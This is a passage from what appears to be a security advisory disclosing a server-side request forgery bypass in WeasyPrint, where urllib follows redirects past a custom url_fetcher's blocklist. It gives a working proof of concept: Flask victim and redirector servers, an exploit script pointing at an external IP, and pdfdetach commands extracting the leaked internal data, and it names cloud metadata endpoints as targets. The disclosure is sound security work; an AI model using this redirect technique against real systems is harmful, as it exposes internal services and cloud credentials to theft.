+ "details": "### Summary\n\nA **Server-Side Request Forgery (SSRF) Protection Bypass** exists in WeasyPrint's `default_url_fetcher`. The vulnerability allows attackers to access internal network resources (such as `localhost` services or cloud metadata endpoints) even when a developer has implemented a custom `url_fetcher` to block such access. This occurs because the underlying `urllib` library follows HTTP redirects automatically without re-validating the new destination against the developer's security policy.\n\n### Details\n\nThe affected code is the default URL fetching mechanism in WeasyPrint (`default_url_fetcher` in `weasyprint/urls.py`).\n\nWhile WeasyPrint allows developers to define custom `url_fetcher` functions to validate or sanitize URLs before fetching (e.g., blocking internal IP addresses or specific ports), the underlying implementation uses Python's standard `urllib.request.urlopen`. By default, `urllib` automatically follows HTTP redirects (status codes 301, 302, 307, etc.) without returning control to the developer's validation logic for the new target URL.\n\nThis behavior creates a Time-of-Check to Time-of-Use (TOCTOU) vulnerability. An attacker can provide a URL that passes the developer's allowlist/blocklist (the Check) but immediately redirects to a blocked internal resource (the Use).\n\n### PoC\n\nTo reproduce this vulnerability, use the following setup. This scenario simulates a developer attempting to block access to internal hostnames (e.g., `localhost`).\n\n**1. victim.py (Internal Service - Port 5000)**\nSimulates a sensitive internal service running on localhost.\n\n```python\nfrom flask import Flask\napp = Flask(__name__)\n\n@app.route('/secret')\ndef secret():\n    return \"CRITICAL_INTERNAL_DATA\"\n\nif __name__ == '__main__':\n    # Listens on localhost:5000\n    app.run(port=5000)\n```\n\n**2. attacker.py (External Redirector - Port 1337)**\nSimulates an external server. 
It accepts a request and redirects it to the blocked hostname (`localhost`).\n\n```python\nfrom flask import Flask, redirect\napp = Flask(__name__)\n\n@app.route('/image.png')\ndef malicious():\n    # Redirect the fetcher to the BLOCKED hostname\n    return redirect(\"http://localhost:5000/secret\", code=302)\n\nif __name__ == '__main__':\n    app.run(port=1337)\n```\n\n**3. exploit.py (Vulnerable Implementation)**\nSimulates the application with a security filter intended to block access to \"localhost\".\n\n```python\nfrom weasyprint import HTML, default_url_fetcher\n\n# Security Filter: Intended to block internal hostnames\ndef secure_fetcher(url):\n    # Simulates a blocklist for 'localhost'\n    if \"localhost\" in url:\n        raise PermissionError(f\"Security Block: Access to {url} denied.\")\n\n    print(f\"[ALLOWED] Initial URL check passed for: {url}\")\n    return default_url_fetcher(url)\n\n# EXPLOIT LOGIC:\n# 1. We access the attacker via its external IP (or '127.0.0.1' in a local test).\n#    That URL passes the check because it does not contain \"localhost\".\n# 2. The attacker redirects to \"http://localhost:5000/...\".\n# 3. urllib follows the redirect to 'localhost' without re-triggering secure_fetcher.\n\ntry:\n    # The attacker's address does not contain 'localhost', so it passes the string check\n    html_content = '<link rel=\"attachment\" href=\"http://54.234.88.160:1337/image.png\">'\n\n    doc = HTML(string=html_content, url_fetcher=secure_fetcher)\n    doc.write_pdf(\"exploit.pdf\")\n\n    print(\"Exploit successful. The 'localhost' block was bypassed via redirect.\")\n    print(\"Check exploit.pdf for 'CRITICAL_INTERNAL_DATA'.\")\nexcept Exception as e:\n    print(f\"Exploit failed: {e}\")\n```\n**4. 
Attacker reads the attachment from the PDF**\n```\n➜ pdfdetach -list resultado_exploit.pdf\n1 embedded files\n1: secret\n➜ pdfdetach -saveall resultado_exploit.pdf\n➜ cat secret\nCRITICAL_INTERNAL_DATA\n```\n**Evidence**\n<img width=\"1514\" height=\"436\" alt=\"image\" src=\"https://github.com/user-attachments/assets/f7881694-be4d-4c63-8bca-2b220e4c87f9\" />\n\n### Impact\n\nThis vulnerability impacts any application or SaaS platform that renders user-supplied HTML/CSS with WeasyPrint and relies on a custom `url_fetcher` to restrict which resources may be loaded.\n\n * **Internal Network Reconnaissance:** Attackers can bypass firewalls or allowlists to scan and access internal services (e.g., Redis, Elasticsearch, admin panels) running on the loopback interface or local network.\n * **Cloud Metadata Exfiltration:** In cloud environments, attackers can redirect requests to metadata services (e.g., `http://169.254.169.254`) to steal instance credentials and escalate privileges.\n * **Security Control Bypass:** The `url_fetcher` validation logic is ineffective against redirect-based attacks, which gives developers a false sense of security.",